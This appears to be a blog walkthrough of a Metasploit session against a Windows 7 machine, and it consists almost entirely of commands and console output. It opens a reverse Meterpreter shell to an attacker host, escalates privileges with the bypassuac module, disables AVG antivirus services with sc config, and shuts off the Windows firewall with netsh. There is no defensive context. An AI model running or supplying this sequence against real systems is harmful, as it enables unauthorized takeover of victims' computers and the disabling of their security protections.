Meterpreter Bypass windows 7 UAC, Cripple down AVG and Windows built-in Firewall

Handler
msf > use exploit/multi/handler msf exploit(handler) > set lhost 192.168.0.9 lhost => 192.168.0.9 msf exploit(handler) > set lport 1111 lport => 1111 msf exploit(handler) > exploit [*] Started reverse handler on 192.168.0.9:1111 [*] Starting the payload handler... [*] Sending stage (752128 bytes) to 192.168.0.10 [*] Meterpreter session 1 opened (192.168.0.9:1111 -> 192.168.0.10:49156) at 2012-02-13 17:04:18 +0800 meterpreter > shell Process 1360 created. Channel 1 created. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>sc query avgwd sc query avgwd SERVICE_NAME: avgwd TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 C:\Windows\system32>sc config avgwd start= disabled sc config avgwd start= disabled [SC] OpenService FAILED 5: Access is denied.

Bypassuac
C:\Windows\system32>exit meterpreter > background msf exploit(handler) > use post/windows/escalate/bypassuac msf post(bypassuac) > show options Module options (post/windows/escalate/bypassuac): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST no Listener IP address for the new session LPORT 4444 no Listener port for the new session SESSION yes The session to run this module on. msf post(bypassuac) > set lhost 192.168.0.9 lhost => 192.168.0.9 msf post(bypassuac) > set lport 1111 lport => 1111 msf post(bypassuac) > set session 1 session => 1 msf post(bypassuac) > exploit [*] Started reverse handler on 192.168.0.9:1111 [*] Starting the payload handler... [*] Uploading the bypass UAC executable to the filesystem... [*] Meterpreter stager executable 73802 bytes long being uploaded.. [*] Uploaded the agent to the filesystem.... [*] Post module execution completed msf post(bypassuac) > [*] Sending stage (752128 bytes) to 192.168.0.10 [*] Meterpreter session 2 opened (192.168.0.9:1111 -> 192.168.0.10:49184) at 2012-02-13 17:06:03 +0800 [*] Session ID 2 (192.168.0.9:1111 -> 192.168.0.10:49184) processing InitialAutoRunScript 'migrate -f' [*] Current server process: rzHopEHJDLdv.exe (2504) [*] Spawning a notepad.exe host process... [*] Migrating into process ID 2488 msf post(bypassuac) > sessions -i 2 [*] Starting interaction with 2... meterpreter >

Disabling AVG Services at startup avgwd and AVGIDSAgent
meterpreter > execute -f cmd.exe -c -H Process 568 created. Channel 1 created. meterpreter > interact 1 Interacting with channel 1... Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\System32>sc config avgwd start= disabled sc config avgwd start= disabled [SC] ChangeServiceConfig SUCCESS C:\Windows\System32>sc config AVGIDSAgent start= disabled sc config AVGIDSAgent start= disabled [SC] ChangeServiceConfig SUCCESS

Disable Firewall
C:\Windows\System32>netsh firewall set opmode mode= disable netsh firewall set opmode mode= disable IMPORTANT: Command executed successfully. However, "netsh firewall" is deprecated; use "netsh advfirewall firewall" instead. For more information on using "netsh advfirewall firewall" commands instead of "netsh firewall", see KB article 947709 at http://go.microsoft.com/fwlink/?linkid=121488 . Ok.